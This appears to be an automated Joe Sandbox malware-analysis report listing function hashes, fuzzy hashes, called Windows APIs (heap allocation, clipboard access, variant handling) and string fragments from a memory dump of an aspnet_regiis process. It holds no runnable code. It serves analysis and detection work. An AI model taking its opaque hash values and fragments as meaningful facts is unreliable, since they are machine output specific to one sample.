                                                                        • Opcode ID: e15e630bb6253087d62375f4f8a3e4c77220ea0a7f3bab1846f68112ed40b60c
                                                                        • Instruction ID: e0f9fab18d063ec4974860db591b83226be42814b347c44654e34327efd4774e
                                                                        • Opcode Fuzzy Hash: e15e630bb6253087d62375f4f8a3e4c77220ea0a7f3bab1846f68112ed40b60c
                                                                        • Instruction Fuzzy Hash: 6DD0C9347E83457AF5255B1CAC13F54B2515705F95F300A04B327FE2D0CAE07121860C
                                                                        APIs
                                                                        • RtlAllocateHeap.NTDLL(?,00000000), ref: 02F8B983
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2224194191.0000000002F51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true
                                                                        • Associated: 00000003.00000002.2224164070.0000000002F50000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2224238398.0000000002F93000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2224263035.0000000002F96000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2224288807.0000000002FA8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_2f50000_aspnet_regiis.jbxd
                                                                        Similarity
                                                                        • API ID: AllocateHeap
                                                                        • String ID:
                                                                        • API String ID: 1279760036-0
                                                                        • Opcode ID: 09f833b0682f561cca66a84721b13a30f5b3865714e45f7d23c664b68b07e5b3
                                                                        • Instruction ID: db5ded3d2cbacde51abffc1623a7609f57a7e5784aea37b4a26018b81a3c5e40
                                                                        • Opcode Fuzzy Hash: 09f833b0682f561cca66a84721b13a30f5b3865714e45f7d23c664b68b07e5b3
                                                                        • Instruction Fuzzy Hash: A6B00231585115F9E1711B215DD5F7F6D6CDF47ED5F104454B214144C046585411D57D
                                                                        APIs
                                                                        • RtlAllocateHeap.NTDLL(?,00000000), ref: 02F8B983
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2224194191.0000000002F51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true
                                                                        • Associated: 00000003.00000002.2224164070.0000000002F50000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2224238398.0000000002F93000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2224263035.0000000002F96000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2224288807.0000000002FA8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_2f50000_aspnet_regiis.jbxd
                                                                        Similarity
                                                                        • API ID: AllocateHeap
                                                                        • String ID:
                                                                        • API String ID: 1279760036-0
                                                                        • Opcode ID: 5b6e11fbec5c32f0f809a96cee6f8086b93d8e872d969640aa46b1a84e7fd525
                                                                        • Instruction ID: cdca6127ce3e95c672de702ca6516f6f27128ec17e4921d3df8cdb29a6b0c7d4
                                                                        • Opcode Fuzzy Hash: 5b6e11fbec5c32f0f809a96cee6f8086b93d8e872d969640aa46b1a84e7fd525
                                                                        • Instruction Fuzzy Hash: 30A00231985115EAD1611F215D95F6B79689B46A95F104854A2141448046685011D569
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2224194191.0000000002F51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true
                                                                        • Associated: 00000003.00000002.2224164070.0000000002F50000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2224238398.0000000002F93000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2224263035.0000000002F96000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2224288807.0000000002FA8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_2f50000_aspnet_regiis.jbxd
                                                                        Similarity
                                                                        • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                        • String ID: S$e
                                                                        • API String ID: 2832541153-1569406346
                                                                        • Opcode ID: 33503c19eb0f67dbfcbd95eae78b4fcab90f212c843a60ddf1bb94a35429f713
                                                                        • Instruction ID: 0511b537eee19a6fb3ab1650720b3067b467245385c348b9b7f903f5e0b6ce5e
                                                                        • Opcode Fuzzy Hash: 33503c19eb0f67dbfcbd95eae78b4fcab90f212c843a60ddf1bb94a35429f713
                                                                        • Instruction Fuzzy Hash: 72416D7150C3818ED311AF3C958832EFFE19B92264F044EADE9E5872D2D6758549CB93
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2224194191.0000000002F51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true
                                                                        • Associated: 00000003.00000002.2224164070.0000000002F50000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2224238398.0000000002F93000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2224263035.0000000002F96000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2224288807.0000000002FA8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_2f50000_aspnet_regiis.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @K$OZ$fU
                                                                        • API String ID: 0-3622593885
                                                                        • Opcode ID: c85e5ca84c5b3b5dc2b0028471b10fb554d99f4d6bf1ac71b2fe3a09c1bea33a
                                                                        • Instruction ID: 49c5815ea335129c7c9be15689a556aaab53f40f986a72e8d5a22faaa290eae4
                                                                        • Opcode Fuzzy Hash: c85e5ca84c5b3b5dc2b0028471b10fb554d99f4d6bf1ac71b2fe3a09c1bea33a
                                                                        • Instruction Fuzzy Hash: BEF10FB1D00218CBEB24DFA8D8553AEBBB2FF85394F28856DD506AB384D7744942CF91
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2224194191.0000000002F51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true
                                                                        • Associated: 00000003.00000002.2224164070.0000000002F50000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2224238398.0000000002F93000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2224263035.0000000002F96000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2224288807.0000000002FA8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_2f50000_aspnet_regiis.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @K$OZ$fU
                                                                        • API String ID: 0-3622593885
                                                                        • Opcode ID: 7d39a9b5ef918d62f879c428f0182d760ea880169fb67603a33e50d2fa1f12aa
                                                                        • Instruction ID: c8e8da65ecf2456ced4835c4c9c69eeac5cafb1da39e7dd99fb08c19d47198b8
                                                                        • Opcode Fuzzy Hash: 7d39a9b5ef918d62f879c428f0182d760ea880169fb67603a33e50d2fa1f12aa
                                                                        • Instruction Fuzzy Hash: F0F110B1D002188BEB20DFA8DC553AEBBB2FF45394F28856DD406AB384D7754942CF81
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2224194191.0000000002F51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true
                                                                        • Associated: 00000003.00000002.2224164070.0000000002F50000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2224238398.0000000002F93000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2224263035.0000000002F96000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2224288807.0000000002FA8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_2f50000_aspnet_regiis.jbxd
                                                                        Similarity
                                                                        • API ID: AllocString
                                                                        • String ID: 0$0$B$C$I$K$N$O$P$R$S$T$U$W$Z$[$]$_$_
                                                                        • API String ID: 2525500382-1084323612
                                                                        • Opcode ID: a1d62be45159ea9037209021c60f3661970284ed6e7d7b443b41b4d66bff84d2
                                                                        • Instruction ID: 905296b2870782be4e571166e93c7e7aaa1f3e0c22b594a98a0d8ab6e30a98f0
                                                                        • Opcode Fuzzy Hash: a1d62be45159ea9037209021c60f3661970284ed6e7d7b443b41b4d66bff84d2
                                                                        • Instruction Fuzzy Hash: FFA1092150DBC28DD332963C885879BBEC16BA7234F184B9DE0F99B2D6C7744406C763
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2224194191.0000000002F51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true
                                                                        • Associated: 00000003.00000002.2224164070.0000000002F50000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2224238398.0000000002F93000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2224263035.0000000002F96000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2224288807.0000000002FA8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_2f50000_aspnet_regiis.jbxd
                                                                        Similarity
                                                                        • API ID: Variant$ClearInit
                                                                        • String ID: a$c$e$g$i$k$m$o$y${
                                                                        • API String ID: 2610073882-4285228952
                                                                        • Opcode ID: 127daf495a49dc3d1fc9260c926a314dce6b2c8308f32be4a9d97c634e3d4719
                                                                        • Instruction ID: a286df70b803551c6f4bb1f8432c4d8bdef420f06aa6d9539be8641c39cf39aa
                                                                        • Opcode Fuzzy Hash: 127daf495a49dc3d1fc9260c926a314dce6b2c8308f32be4a9d97c634e3d4719
                                                                        • Instruction Fuzzy Hash: 1841693260C7C18ED3259A3CC84975EBFD26BE2314F084A6DE0E5873D6D6B98149C763
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2224194191.0000000002F51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true
                                                                        • Associated: 00000003.00000002.2224164070.0000000002F50000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2224238398.0000000002F93000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2224263035.0000000002F96000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2224288807.0000000002FA8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_2f50000_aspnet_regiis.jbxd
                                                                        Similarity
                                                                        • API ID: InitVariant
                                                                        • String ID: `$`$e$h$l$r${
                                                                        • API String ID: 1927566239-1369895717
                                                                        • Opcode ID: cf3e60e7ca1a24f7497c9d9949eeca596bea670c3b0dfcc4535fb960bf3e7815
                                                                        • Instruction ID: 9496f679f2fda155a47771fdbe36a361f66ef50f9406cbeab9b15888f94e44ab
                                                                        • Opcode Fuzzy Hash: cf3e60e7ca1a24f7497c9d9949eeca596bea670c3b0dfcc4535fb960bf3e7815
                                                                        • Instruction Fuzzy Hash: 8141477150C7C18AD3668B38889875BBED16BD6328F488B9CE5E50B3D6C3B58506CB63
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2224194191.0000000002F51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true
                                                                        • Associated: 00000003.00000002.2224164070.0000000002F50000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2224238398.0000000002F93000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2224263035.0000000002F96000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2224288807.0000000002FA8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_2f50000_aspnet_regiis.jbxd
                                                                        Similarity
                                                                        • API ID: InitVariant
                                                                        • String ID: `$`$e$h$l$r${
                                                                        • API String ID: 1927566239-1369895717
                                                                        • Opcode ID: 07d87175a681b593ffb84c0fa3a1312f04f08edd05fb91f5e76fe73f558c05ba
                                                                        • Instruction ID: 91186410460bd19d2c8073807bdee144cf1197e7914c4442c5eff716713ed4b2
                                                                        • Opcode Fuzzy Hash: 07d87175a681b593ffb84c0fa3a1312f04f08edd05fb91f5e76fe73f558c05ba
                                                                        • Instruction Fuzzy Hash: 9841593140D7C08ED3268B38885870FBFD16BD6228F498B8CE4E50B2D2C3B58405CB63
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2224194191.0000000002F51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true
                                                                        • Associated: 00000003.00000002.2224164070.0000000002F50000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2224238398.0000000002F93000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2224263035.0000000002F96000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2224288807.0000000002FA8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_2f50000_aspnet_regiis.jbxd
                                                                        Similarity
                                                                        • API ID: MetricsSystem
                                                                        • String ID:
                                                                        • API String ID: 4116985748-3916222277
                                                                        • Opcode ID: c2890b206e4d2d055c05f1be9578a55436c2592dd2383766dd7c6a125b97c01e
                                                                        • Instruction ID: c2125101e8c9eecba57d66b31128515156586c394b9fd73ccbbd7716fff43d9e
                                                                        • Opcode Fuzzy Hash: c2890b206e4d2d055c05f1be9578a55436c2592dd2383766dd7c6a125b97c01e
                                                                        • Instruction Fuzzy Hash: D2319FB49183048FDB00EF6CD98561EBBF4BB88304F11892EE499DB350D770A959CB82